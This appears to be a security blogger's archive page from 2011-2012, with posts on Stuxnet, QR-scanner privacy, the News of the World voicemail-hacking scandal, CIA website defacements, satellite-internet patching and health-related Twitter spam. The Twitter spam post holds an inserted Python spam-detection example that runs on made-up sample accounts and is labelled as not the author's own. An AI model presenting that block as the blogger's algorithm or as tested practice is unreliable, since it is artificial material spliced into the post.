The most cost-effective long-term approach to personal computer security is the promotion of mature and responsible attitudes among users. Lasting security will not be achieved by technology, nor by constraints on those who use it. True security can only be achieved through the willing compliance of users with universally accepted principles of behavior. Such compliance will increase as society as a whole becomes increasingly computer literate, and users understand the personal value of the technology they use.

Friday, June 29, 2012

Stuxnet, Flame, Information Security and Privacy Blog Posts

I thought I would update the blog for June by listing some of my recent articles and posts from elsewhere, mainly the ESET Threat Blog, unless stated otherwise.
As you can see, the reports that Stuxnet was indeed a U.S. government project sparked a couple of articles. It also got me talking on a podcast: Demystifying nation-state attacks and their impact

Wednesday, May 16, 2012

QR Code Privacy Issues and AT&T

Ouch! After saying that I thought AT&T had done a better-than-average job with its QR code scanner app for the iPhone someone pointed out that AT&T's scanner is one of a number of such apps that have privacy issues. The point was made in a comment on the ESET Threat Blog by Roger Smolski who runs this excellent website focused on QR codes.

It seems that, like me, Roger is a fan of technology but keeps a wary eye on potential downsides, like a QR code scanner that does more than the user bargained for. This definitely seems to be the case with the AT&T scanner, which lets AT&T know what you scan. I liked the AT&T scanner for installing with a preview option by default, but now dislike it because of this under-disclosed sharing of data that I consider personal (i.e. what QR codes I choose to scan).

According to Roger, confirmed by his technical code scanner analysis, some QR scanner apps, like NeoReader, are gathering data on your use of the app. The AT&T scanner is an example of this. An example of a decent scanner that does not do this is Bar Code Scanner for Android. I am going to have to look further for an iPhone QR Code scanner app that is independently confirmed as "non-tracking." In the meantime, here are other QR/privacy articles by Roger Smolski:


Oh, and BTW, FYI, it seems QR Code is a registered trademark of Denso Wave Corp. So maybe I will adopt Roger's usage of 2D codes to avoid stepping on anyone's IP toes.

Monday, April 23, 2012

AT&T Gets QR Code Scanner Right

AT&T might not be the best-loved company in America but it deserves praise for getting something right: The QR code scanner that it supplies for the Apple iPhone has a preview-and-authorize mode installed as the default. 

I have explained why this is important in this article on QR codes and NFC tags which includes a video that makes the point quite vividly: You should not let your hardware act on the instructions embedded in a QR code or NFC tag without first knowing what those actions are. The AT&T code scanner for iPhone is set up to do that. Other scanners also have that ability but do not behave that way by default.

I have bashed AT&T for poor wireless products and service on numerous occasions, but I believe in praise where praise is due. Security has long been a priority at AT&T. Over the years I have trained thousands of AT&T employees on everything from server security to security in the workplace. So I was happy to see their QR code reader was designed right.

Sunday, March 18, 2012

Cybersecurity Reading List for March 2012

Cybersecurity reports, blog posts, and white papers are not in short supply these days, so I thought I would help folks decide what subset to read. I'm hoping this will make up for some of the neglect this blog has suffered over the past few months, due in no small part to my heavy--yet enjoyable--workload at ESET.

Tuesday, January 03, 2012

Chinese hacks and Anonymous hacking: Lessons of the end game when nothing is 100% secure

I read about the hacking of the California State Law Enforcement Association or CSLEA website by Anonymous "for fun and m4yh3m!" just after reading about the latest round of hacking of Chinese websites. Nota Bene: I am NOT saying Anonymous hacked the Chinese websites; I'm NOT talking about Chinese hacking of U.S. websites; and I'm NOT writing as an employee of any organization.

Sunday, August 14, 2011

Etymologically Speaking: Cracking or hacking, mobile phones or voicemail?


In the wake of the News of The World (NOTW) scandal in which "journalists" are alleged to have listened to, and sometimes erased, messages left on phones that did not belong to said journalists, the term phone hacking has shot up the charts of widely misused phrases.

As this very helpful article on Geek News Central points out, the NOTW scandal is not really about phone hacking, it is about voicemail hacking, which the article's title tries to make clear: How To Hack Mobile Phone Voicemail.

Like the proverbial Trojan Horse, which was really neither horse nor Trojan, we are probably stuck with phone hacking as a phrase hacked together by hacks to describe some types of phone system manipulation and/or phone user duping. Such subtle distinctions may not matter to some people, but I think they matter to information security professionals. Why? Because part of our role in society, one that I personally take very seriously, is trying to bring clarity to matters involving the theft of information, unwarranted invasions of privacy through the abuse of information systems, use of computer systems to commit fraud, and so on.

And perhaps no word in recent memory has been more abused and hacked than hackers. As Steven Levy firmly established more than 25 years ago in his book, Hackers: Heroes of the Computer Revolution, the word started out with a positive connotation, a subject he addressed at the recent DefCon hacker conference in Las Vegas.

For almost as many years, my good friend Dr. Mich Kabay has tried to maintain a consistent distinction between hackers and criminal hackers. In his copious writings and teachings on information assurance, Mich diligently avoids omitting the word criminal from the phrase, either for convenience or brevity (see these Google results for examples).

(In the 1990s, some people tried to get criminal hackers shortened to crackers but that was doomed by ambiguity, between the decidedly non-technical use of the term cracker in the Southern states and people who specialize in cracking encryption codes.)

While criminal hackers are generally to be reviled for the mess they are making of otherwise beneficial technology, some hackers may be deserving of praise. You can get a personal perspective on this distinction by watching the excellent documentary made by another good friend, Ashley Schwartau, titled "Hackers Are People Too."

All of which underlines the ambiguity--some might say neutrality--of information technology, and the need to use care, as well as clear and specific language, when discussing its use or abuse. Voicemail can be incredibly useful, but it can be abused and cause pain when "hacked" by people of questionable ethics. Encryption can protect your private information from prying eyes, or allow a criminal hacker to hold your data for ransom. Cracking encryption can save lives or expose people to their enemies.

You might say that the problem with technology is the people who abuse it. We need to distinguish them from the people who try to improve it. And choosing our words wisely is one way of making that distinction.

Footnote: I will have a lot more to say about this and other aspects of information security after September 1, which is when I transition to a new position: Security Evangelist for ESET.

Wednesday, July 13, 2011

The NOTW Phone Hacking Scandal: Lessons for risk managers keep coming

In the context of data privacy, cyber security, and risk management I once wrote: "Failure to police your employees and sub-contractors can have serious consequences."

In the last 6 days we have seen massive proof of that as the News of the World (NOTW) phone hacking scandal has erupted onto the world stage, spewing a toxic mix of consequences, the like of which we have never seen before.

Consider anyone who owned stock in BSkyB. I documented their bad news yesterday. And consider any innocent employees of the News of the World who are suddenly without a job. If those people find it hard to get new jobs because of the stigma of being ex-NOTW employees, they could argue that NOTW robbed them of their professional reputation and possibly sue NOTW and its executives on that basis.

I will admit that the possibility of getting sued for running a company in such a disreputable manner that you drag down your employees with you is not a risk that I had previously considered. But we now see that such a thing could play out as a consequence of a company hiring people to do illegal hacking, or turning a blind eye to hacking, in other words, failure to enforce ethical business practices and appropriate privacy policies. Here's what the Guardian wrote on the subject around the 1.52pm mark on their July 10 live blogging of the NOTW scandal:
Dismissed News of the World journalists who are unable to find replacement jobs and feel their professional reputations have been severely damaged could have legal grounds for suing News International, according to one employment law source. Owen Bowcott, who is the Guardian's acting legal affairs correspondent, writes about a Lords ruling that could have implications:

"There is a precedent in a 1997 House of Lords judgment that covers the predicament of two former employees of the collapsed Bank of Credit and Commerce International who claimed they suffered the "stigma" of being associated with the ex-employer that put them at a "serious disadvantage" of finding new work. "In [Malik vs BCCI] the House of Lords upheld, in principle, the right of innocent ex-employees to sue a former employer for common law damages where revelations concerning the employer's corrupt practices had damaged their prospects of future employment in the industry," one employment expert suggested. "Corruption was assumed as a hypothesis for purposes of the decision"."
Bowcott went on to say "Loss of reputation, the 1997 judgment pointed out, is "inherently difficult to prove" but it added that there is an implied mutual obligation of trust and confidence between employer and employee." The House of Lords judgment concluded: "Difficulties of proof cannot alter the legal principles which permit, in appropriate cases, such claims for financial loss caused by breach of contract being put forward for consideration."

So, there you have one more risk of bad corporate governance: Revelation of the company's corrupt practices damaging the employment prospects of your employees, leading to lawsuits. And to think it all started with a voicemail PIN being guessed or social engineered.

Tuesday, July 12, 2011

Hacking Costs Billions in Stock Losses: 2.88 billion more reasons to enforce security policies

The negative impact of information security incidents on stock prices has been documented numerous times over the past ten years, but I think we are now witnessing the most dramatic hacking-related stock losses ever seen, as reported in the Guardian last Friday under the headline BSkyB shares fall £1.8bn. For American readers:
  • BSkyB is British Sky Broadcasting, a satellite TV company 
  • BSkyB is like DirecTV only bigger (based on Market Cap), 
  • the Guardian is a very reputable British newspaper,
  • one British pound is worth about $1.6,
  • that share drop erased $2.88 billion from the company's value.
What information security incident at BSkyB triggered this share drop? That's a trick question! The stock dropped because of the illegal hacking of voicemail by a person or persons hired by a British newspaper, News of the World, often referred to as NOTW.

The owner of NOTW is Rupert Murdoch's News International (NASDAQ:NWS) which has been looking to buy BSkyB, pending approval by regulators, who may not be so keen to approve the deal given the mess that News International is now in as a result of the scandal surrounding the voicemail hacking. When you look at how the stock of NWS fared today you see where the term "fell off a cliff" comes from:

Bear in mind that NWS owns the Wall Street Journal, the New York Post and Fox everything, from movies to TV channels to TV stations.

So what we have here is an amazing example of how a few people committing acts of hacking on behalf of one relatively small part of a big company can cause massive damage that extends beyond the company itself, not to mention the victims of the hacking, like the parents of deceased soldiers and at least one murder victim.

And the collateral damage will roll on. People who own shares of BSkyB and NWS may sue the company executives. People laid off by the News of the World, which has been closed for good, may sue for loss of reputation by association. Victims of the hacking may sue.

All of which could have been avoided if the News of the World had adhered to privacy standards and ethical business standards. But the company allowed this to happen, over a period of years, so there can be no defense based on the existence of policies. (If you have your company network password taped to the bottom of your keyboard, in violation of company security policy, there is legal precedent for saying that is not grounds for dismissal if the company has tolerated everyone doing the same thing for some time.) 

There will be much more about this hacking-induced upheaval as the days roll on...including the huge irony of hacking closing a major British newspaper, not because of outside criminal hackers breaking in, but because of insiders illegally hacking people outside the company.

BTW, if you want the whole sordid story of this hacking debacle prior to this latest development, including police corruption and royal family secrets, this Wikipedia article is a good source. I will end with a footnote on the BSkyB share value: the amount wiped out by the end of today was $3.84 billion.

Saturday, June 18, 2011

CIA Website Hack Recalls Early Days of eCommerce

Recent hacking of the CIA website brings back memories of the earliest days of eCommerce on the Web and the first wave of website hacking. The first defacing of the CIA website was carried out in September 1996. For those too young to remember, here's what it looked like:
The hacking was done by Swedish hackers using the name "Group Power Through Resistance" and their goals went beyond embarrassing the CIA. According to TechWorld Sweden:

"The attack messages were primarily intended for the then Swedish state prosecutor [Bo Skarinder] who accused members of the Swedish Hackers Association of hacking. The sentence "Stop lying Bo Skarinder!" is remembered to this day."

The most recent CIA website hack, as of this post, was the following effort by an Indian hacker who goes by “lionaneesh":

Lionaneesh claims to have gained access by exploiting an XSS or cross-site scripting vulnerability (here's a detailed explanation of XSS written by my brother Mike).

When Lionaneesh tweeted about his exploits on a Twitter account his name was listed as Aneesh Dogra (that name has since been removed, but the Twitter account is still active). Posting a "follow me" message on a hacked CIA web page is one of the more interesting ways to gain followers (of which @lionaneesh now has 206).

Via Twitter, Aneesh expressed affinity with LulzSec, the hacker group that claimed responsibility for an attack on the CIA earlier in the week. The page defaced by Mr. Dogra was taken down quite quickly, but a screenshot of it was posted on The Hacker News (as reported on GMA NEWS, the Filipino news site).

That first round of government agency website hacks in 1996 served as a wakeup call to eCommerce sites which were starting to come on line at that time (a time when I was providing consulting services to such companies, via the NCSA that later became ICSA Labs, and the Miora Systems Consulting company that later became InfoSec Labs, founded by Michael Miora, Vincent Schiavone, David Brussin, and of course me).

When I was writing my first paper on the topic of Internet Commerce, delivered at a conference in Hong Kong in early 1996, I struggled to find examples of website defacing. The one that does stick with me is a fur dealer who was targeted by animal rights activists. That sent a strong message about brand-tarnishing and activist-hacking, which became known as hacktivism. It also alerted companies to the truly global nature of the world wide web. You might write your website content for your customers, but the entire world can read it if they choose to do so.

To this day I would advise companies against publishing content on their websites that advocates an unpopular point-of-view or employs insensitive language, unless they are well-prepared to repel attacks from people who do not share that point of view. An example I used to cite was a timber industry website that was thinking of putting its newsletters online, the content of which was standard stuff within the industry, but a red flag to environmental extremists (who would be able to find it much more easily on the web than by getting a copy of the printed edition.)

A quick read of the Wikipedia page on hacktivism will tell you the term is still emotion-laden because both hacking and activism remain ambiguous terms, seen as the illegal actions of bad actors by those on the receiving end, and the right thing, done for good reason, by the doers. The issue is not made any easier by the pugnacious "shoot-the-messenger" reaction of many organizations to news that their systems are vulnerable.

My wife encountered this when she questioned a suspicious network connection at a government facility containing highly sensitive classified data. She was angrily asked: "What do you think you're doing probing this network?" As a graduate of the Stephen Cobb School of Tact and Diplomacy she avoided snapping back with the obvious: "My job!" Instead, she calmly explained that her boss had asked her to create a map of the network for which he was responsible and, in doing so, she had found an undocumented connection to an insecure network. Thanks to a boss who stood by his employee [my wife] the issue was resolved, but not before the threat of prosecution was raised by the "offended" party who owned the insecure network (and who chose to remain in denial of its insecurity).

Many such stories are documented on the web and one can imagine a hacker finding a flaw in the CIA website wondering what to do about it. Tell the CIA? Who may come looking for you because they can't accept that a. their site is insecure, b. your intentions are honorable. Clearly this is a dilemma. When you exploit the vulnerability that you have found you create an example that can be used to remind governments and companies that web security is not a fix-and-forget challenge but an ongoing effort. Nevertheless, the right thing to do is NOT hack the site. And hacking it for personal glory does nothing to help your claim that you were trying to do the right thing.

Finally, it has to be said that if any federal government agency ought to be a showcase of website security best practices it is the CIA. I'm NOT saying they deserved to be hacked, but they deserve to be on the receiving end of probing questions. As do other government entities. For example, the method that Private Bradley Manning used to remove copies of classified government documents from SIPRNET, the ones that ended up on Wikileaks, was clearly a violation of policies and procedures that my wife laid down over ten years ago to address such problems. It is hard to argue that the people who chose not to enforce such policies are entirely blameless for what their actions, or inaction, allowed to transpire.

Sunday, May 08, 2011

Internet Security and Satellite Internet: A gap that needs to be patched?


Today there are over a million computers in America that connect to the Internet via a satellite connection, and the number continues to grow. During this past winter I used my spare time to write a white paper on satellite Internet connectivity, mainly to drive home the point that it is no substitute for DSL/cable/fiber when it comes to broadband access for rural communities. The white paper has just been published by the Rural Mobile and Broadband Alliance (RuMBA).

However, an interesting security issue came up in the course of writing this 22-page paper and I thought I would highlight it here. If you like, you can download the full report at no charge from this link. (You can also read more about this research in this blog post.)

One of the reasons nobody should seriously consider defining satellite Internet as broadband is the daily download limit that satellite services impose, typically about 400 megabytes a day, which is less than some operating system upgrades we have seen in recent years. These capacity limits are not just a serious inconvenience, they have serious implications for computer security.

Basically, satellite Internet users have to turn off automated updating of operating systems and applications to prevent incurring costs and usage restrictions arising from bandwidth caps. However, as I am sure you know, computer and software makers increasingly rely on these automated processes to distribute the security “patches” required to prevent exploitation of computers by criminal hackers.

Computers with unpatched operating systems and applications are a prime target for hackers as these machines are more easily exploited and turned into “zombies” under the control of attackers. Zombies are then orchestrated into “botnets” that are used to attack other systems, from commercial and government websites to utility systems and entire sections of the Internet itself. The Department of Homeland Security today considers unpatched consumer computers a threat to national security and the problem has been openly discussed by cyber-security officials at the federal level since at least 2002.

Some might argue that computers on a relatively slow satellite connection (you're lucky to get above 256Kbps when uploading) are not attractive to botnet builders, but some botnet attacks don't need much speed or capacity to be effective. The fact that the IP address blocks occupied by these "at risk" systems are relatively easy to identify may also be considered an added risk factor.

Solutions are possible, like special exemptions on bandwidth caps for authorized OS and application patches, but so far I have not heard any talk of these being implemented. Since the federal government is currently handing over tens of millions of taxpayer dollars to satellite Internet service providers to help them build their subscriber base, maybe that money should come with strings, like better provision for prompt security patching.

Sunday, May 01, 2011

Twitter Spam Getting Bad, Now Poisoning Health-Related Search Results

What is Twitter spam? A whole bunch of "people" tweeting the same thing from accounts that are likely automated. These bogus accounts have a human name followed by a number, like Colettaj339. When you check out the profile you see this person has:
  • Sent many tweets (all pushing links), 
  • Not followed anyone (Following=0). 
In other words, the account merely exists to direct clicks to a promotion in return for money. Following the pattern of previous forms of spam this Twitter-spam is growing fast and targeting vulnerable people.
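The profile characteristics listed above (a human name followed by digits, many tweets that all push links, and Following=0), plus the "whole bunch of people tweeting the same thing" pattern, are enough for a simple classifier. The following is an added example written for this post, not Twitter's code or any algorithm the author published: it scores constructed sample account records against those three heuristics and clusters accounts by the exact link they push. The account handles, counts, tweet text and links are made up for illustration.

```python
import re
from dataclasses import dataclass, field


@dataclass
class Account:
    handle: str
    tweets: int          # total tweets sent
    following: int       # accounts followed
    recent: list = field(default_factory=list)  # text of recent tweets


# Handle shaped like a name followed by a run of digits, e.g. "Colettaj339".
NAME_THEN_DIGITS = re.compile(r"^[A-Za-z]{3,}\d{2,}$")
URL = re.compile(r"https?://\S+", re.I)


def link_ratio(tweets):
    """Fraction of tweets that contain a link."""
    if not tweets:
        return 0.0
    return sum(1 for t in tweets if URL.search(t)) / len(tweets)


def spam_score(acct, min_tweets=10):
    """Return (score, reasons): one point per heuristic hit, 3 is a strong signal."""
    reasons = []
    if NAME_THEN_DIGITS.match(acct.handle):
        reasons.append("name+digits handle")
    if acct.following == 0 and acct.tweets >= min_tweets:
        reasons.append("follows nobody despite many tweets")
    if acct.tweets >= min_tweets and link_ratio(acct.recent) >= 0.9:
        reasons.append("nearly every tweet pushes a link")
    return len(reasons), reasons


def duplicate_link_clusters(accounts, min_accounts=3):
    """Map each link to the accounts pushing it, keeping links pushed by
    at least min_accounts distinct accounts (the coordinated-spam pattern)."""
    clusters = {}
    for a in accounts:
        for t in a.recent:
            for u in URL.findall(t):
                clusters.setdefault(u.lower(), set()).add(a.handle)
    return {u: sorted(h) for u, h in clusters.items() if len(h) >= min_accounts}


def flag_spam(accounts, threshold=2):
    """Handles scoring at or above threshold, sorted for stable output."""
    return sorted(a.handle for a in accounts if spam_score(a)[0] >= threshold)


# Constructed sample data: three bot-like accounts pushing one link,
# a genuine patient, and a legitimate organisation account.
PITCH = "Iron overload? Read this http://example.invalid/iron-ebook"
SAMPLE = [
    Account("Colettaj339", 250, 0, [PITCH] * 5),
    Account("Rhondas812", 180, 0, [PITCH] * 5),
    Account("Maryk47", 95, 0, [PITCH] * 5),
    Account("ironpatient", 40, 120, [
        "Just got my ferritin results back, phlebotomy again next week",
        "Useful guide: http://example.invalid/guide",
        "Anyone else with hemochromatosis get joint pain?",
    ]),
    Account("idi_official", 500, 300, [
        "New guide out http://example.invalid/guide",
        "Ask your doctor about a transferrin saturation test",
    ]),
]

if __name__ == "__main__":
    print(flag_spam(SAMPLE))
    print(duplicate_link_clusters(SAMPLE))
```

The threshold of two hits keeps a real person with an unlucky handle off the list, while the link clustering catches the coordinated pattern even for accounts that individually look less obvious.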

For example, I have been encountering more and more of this stuff when searching Twitter for the term "hemochromatosis" which is a scary and potentially fatal genetic condition that causes iron overload, a toxic buildup of iron in joints and organs like the liver, heart, brain, thyroid and so on.

Given the pathetically poor level of knowledge about this condition that exists in the general medical population it is very common for people who find they have hemochromatosis to turn to various channels on the Internet for information, including Twitter.

My hemochromatosis search on Twitter today found a bunch of tweeted links leading to a pitch page for an eBook on Iron Overload priced at $37. Bear in mind that the highly regarded and medically reviewed Iron Disorders Institute Guide to Hemochromatosis can be purchased in paperback on Amazon.com for a lot less than half that price, and can be had as an eBook on Kindle for $9.89.

Maybe the tweet-spammed book is brilliant and worth $37 but the large number of spam Tweets makes me doubtful. And this is by no means the first targeting of hemochromatosis sufferers on Twitter. Tweet spam leading people to an article site has also used this hook. In fact, I'm willing to bet that whenever you search a nasty disease, for example multiple sclerosis, you will see this Tweet spam. Here are some observations about this depressing phenomenon:
  1. Cobb's First Law of Communications Technology: Every new communications technology will quickly be abused, most likely by people lying in the hopes of making money.
  2. Twitter has not done enough to make sure new accounts are opened by real people.
  3. Twitter is not doing enough to remove blatant spam accounts (email me at scobb[at]scobb[dot]net for the algorithm to identify these accounts, guys; it's not that complicated).
  4. A depressingly large number of people need to ask themselves whether what they are doing with their computers is helping or hurting their fellow man, woman, or child.
  5. Until the median level of morality among computer literate humans starts to rise, we will see spam, scams, fraud, and the like continuing to poison the technology and waste precious resources (like the energy that email spam wastes, enough to power millions of homes).
BTW, if you want solid information about hemochromatosis, visit The Iron Disorders Institute. If you want Twitter to do more to stop Twitter-spam contact the company. I find that a fax to the CEO is a good communications channel to use: Mr. Evan Williams, CEO, Twitter, Inc., 795 Folsom St., Suite 600, San Francisco, CA 94107, fax 415-222-0922.

Saturday, April 30, 2011

Cost of a data breach climbs higher

Well worth paying attention to, whether you are in privacy or security, in business or investing in businesses, CIPP or CISSP:

Cost of a data breach climbs higher - Dr. Ponemon's blog

"The latest U.S. Cost of a Data Breach report, which was just released today, shows that costs continue to rise. This year, they reached $214 per compromised record and averaged $7.2 million per data breach event. The fact is that individuals still care deeply about their personal information and they lose trust in companies that fail to protect it.

It’s not only direct costs of a data breach, such as notification and legal defense costs that impact the bottom line for companies, but also indirect costs like lost customer business due to abnormal churn. This year’s study showed some very interesting results. In my view, there are a few standout trends."